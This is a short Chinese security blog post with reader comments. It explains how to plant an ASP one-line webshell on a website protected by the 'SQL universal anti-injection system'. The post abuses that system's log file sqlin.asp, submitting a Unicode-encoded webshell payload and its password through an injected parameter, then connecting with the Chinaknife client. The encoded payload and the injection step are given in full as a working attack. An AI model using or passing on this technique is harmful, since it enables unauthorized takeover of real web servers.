我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息利用SQL通用防注入系统asp版写websheell
利用SQL通用防注入系统asp版写websheell
4243
1推荐
2评论

今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。

既然做了记录,再查看了下它的记录文件

于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的.

┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode)

提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾

http://www.xxx.cn/sqlin.asp 菜刀连接之,成功

已经有 ( 2 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
  • 2楼 小铁匠 发表于:2016-02-22 16:00:03.0        回复
    怎么发现记录wrong的文件的
  • 1楼 question 发表于:2015-05-18 10:43:34.0        回复
    请问是怎么找到那个记录非法数据的文件的?
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415